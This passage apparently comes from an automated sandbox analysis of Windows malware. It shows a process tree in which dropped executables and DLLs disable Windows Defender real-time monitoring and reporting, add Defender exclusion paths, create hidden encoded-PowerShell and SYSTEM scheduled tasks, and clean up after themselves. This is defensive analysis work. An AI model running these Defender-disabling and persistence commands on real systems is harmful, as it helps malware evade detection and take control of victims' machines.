            Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
            PID: 1104

      C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /CREATE /TN "gyxQJwUvS" /SC once /ST 08:43:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        - Creates scheduled task(s)
        PID: 1952

      C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /run /I /tn "gyxQJwUvS"
        PID: 616

      C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /DELETE /F /TN "gyxQJwUvS"
        PID: 2000

      C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /CREATE /TN "bsajrHInQFlcwYICLj" /SC once /ST 10:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC\nuKOVfXXHsnqFlD\XXlxCEo.exe\" yn /site_id 525403 /S" /V1 /F
        - Drops file in Windows directory
        - Creates scheduled task(s)
        PID: 1356
C:\Windows\system32\taskeng.exe
  Command line: taskeng.exe {2CCBBF4E-408F-4316-8BEF-6E3882ADB62C} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
  PID: 1644

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 456

    C:\Windows\system32\gpupdate.exe
      Command line: "C:\Windows\system32\gpupdate.exe" /force
      PID: 1016

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 856

    C:\Windows\system32\gpupdate.exe
      Command line: "C:\Windows\system32\gpupdate.exe" /force
      PID: 852

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 1104

    C:\Windows\system32\gpupdate.exe
      Command line: "C:\Windows\system32\gpupdate.exe" /force
      PID: 1472

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 1464

    C:\Windows\system32\gpupdate.exe
      Command line: "C:\Windows\system32\gpupdate.exe" /force
      PID: 1112

C:\Windows\system32\gpscript.exe
  Command line: gpscript.exe /RefreshSystemParam
  PID: 1456
C:\Windows\system32\taskeng.exe
  Command line: taskeng.exe {3A54EB8F-8BD6-4176-9E74-7CB7F748CF2C} S-1-5-18:NT AUTHORITY\System:Service:
  PID: 1500

  C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC\nuKOVfXXHsnqFlD\XXlxCEo.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC\nuKOVfXXHsnqFlD\XXlxCEo.exe yn /site_id 525403 /S
    - Executes dropped EXE
    - Drops file in System32 directory
    PID: 1956

    C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /CREATE /TN "grUAYCuXF" /SC once /ST 08:06:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      - Creates scheduled task(s)
      PID: 604

    C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /run /I /tn "grUAYCuXF"
      PID: 1548

    C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /DELETE /F /TN "grUAYCuXF"
      PID: 1456

    C:\Windows\SysWOW64\cmd.exe
      Command line: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      PID: 2044

      C:\Windows\SysWOW64\reg.exe
        Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
        - Modifies Windows Defender Real-time Protection settings
        PID: 2020

    C:\Windows\SysWOW64\cmd.exe
      Command line: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      PID: 1868

      C:\Windows\SysWOW64\reg.exe
        Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
        - Modifies Windows Defender Real-time Protection settings
        PID: 1544

    C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /CREATE /TN "gNqNItRBX" /SC once /ST 09:36:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      - Creates scheduled task(s)
      PID: 996

    C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /run /I /tn "gNqNItRBX"
      PID: 680
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gNqNItRBX"3⤵PID:456
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:323⤵PID:1880
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1716
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:643⤵PID:436
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:323⤵PID:1632
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:324⤵PID:972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:643⤵PID:516
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:644⤵PID:544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\dDIGKoNsMZUYTlNI\oIQqpkQx\vhWuIUfWtouWEazJ.wsf"3⤵PID:1468
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\dDIGKoNsMZUYTlNI\oIQqpkQx\vhWuIUfWtouWEazJ.wsf"3⤵
- Modifies data under HKEY_USERS
PID:844 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JuPVqtTuU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JuPVqtTuU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NCzfTsUHwfUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NCzfTsUHwfUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\phVJOPZyZJOU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\phVJOPZyZJOU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRZxVByAcqfAC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRZxVByAcqfAC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hRSVwMivPDBwjMVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hRSVwMivPDBwjMVB" /t REG_DWORD /d 0 /reg:644⤵PID:1720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JuPVqtTuU" /t REG_DWORD /d 0 /reg:324⤵PID:824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JuPVqtTuU" /t REG_DWORD /d 0 /reg:644⤵PID:1952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NCzfTsUHwfUn" /t REG_DWORD /d 0 /reg:324⤵PID:616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NCzfTsUHwfUn" /t REG_DWORD /d 0 /reg:644⤵PID:1916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\phVJOPZyZJOU2" /t REG_DWORD /d 0 /reg:324⤵PID:612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\phVJOPZyZJOU2" /t REG_DWORD /d 0 /reg:644⤵PID:1688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR" /t REG_DWORD /d 0 /reg:324⤵PID:1940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR" /t REG_DWORD /d 0 /reg:644⤵PID:964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRZxVByAcqfAC" /t REG_DWORD /d 0 /reg:324⤵PID:1880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRZxVByAcqfAC" /t REG_DWORD /d 0 /reg:644⤵PID:1440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hRSVwMivPDBwjMVB" /t REG_DWORD /d 0 /reg:324⤵PID:1776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hRSVwMivPDBwjMVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC" /t REG_DWORD /d 0 /reg:324⤵PID:556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC" /t REG_DWORD /d 0 /reg:644⤵PID:812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:324⤵PID:956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:644⤵PID:2032
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gIPehHFXk" /SC once /ST 01:49:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gIPehHFXk"3⤵PID:1528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gIPehHFXk"3⤵PID:1620
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:916
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1684
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1776
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2000
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ygwXmmYWmIOQZqgey" /SC once /ST 00:12:51 /RU "SYSTEM" /TR "\"C:\Windows\Temp\dDIGKoNsMZUYTlNI\cbiAkEIOWvTrFua\DIgdmmJ.exe\" c9 /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:436
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ygwXmmYWmIOQZqgey"3⤵PID:1924
-
-
-
C:\Windows\Temp\dDIGKoNsMZUYTlNI\cbiAkEIOWvTrFua\DIgdmmJ.exeC:\Windows\Temp\dDIGKoNsMZUYTlNI\cbiAkEIOWvTrFua\DIgdmmJ.exe c9 /site_id 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1044 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bsajrHInQFlcwYICLj"3⤵PID:812
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1356
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1800
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:2032
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:824
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JuPVqtTuU\XqBJAR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "HnhGGmYUcuANzZs" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1932
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HnhGGmYUcuANzZs2" /F /xml "C:\Program Files (x86)\JuPVqtTuU\yAawgAz.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1464
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "HnhGGmYUcuANzZs"3⤵PID:564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "HnhGGmYUcuANzZs"3⤵PID:1060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qwZMgdHJPwAVJo" /F /xml "C:\Program Files (x86)\phVJOPZyZJOU2\FBIXlpX.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1688
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fSwSvvnEEoVJd2" /F /xml "C:\ProgramData\hRSVwMivPDBwjMVB\BpVoGuV.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1784
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mBqqQEpEndyJZOmyy2" /F /xml "C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR\dgoNAPG.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:972
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IGrzNxCjwBhGmyGrIyA2" /F /xml "C:\Program Files (x86)\wRZxVByAcqfAC\wJaHoYc.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ClHbhijVssadMpWzU" /SC once /ST 07:02:58 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\dDIGKoNsMZUYTlNI\goYPkxTb\FtPPZcf.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1096
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ClHbhijVssadMpWzU"3⤵PID:1924
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1976
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1952
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1092
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ygwXmmYWmIOQZqgey"3⤵PID:1168
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dDIGKoNsMZUYTlNI\goYPkxTb\FtPPZcf.dll",#1 /site_id 5254032⤵PID:536
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dDIGKoNsMZUYTlNI\goYPkxTb\FtPPZcf.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2016 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ClHbhijVssadMpWzU"4⤵PID:1428
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1208
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1580
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1864
Network
MITRE ATT&CK Enterprise v6
Downloads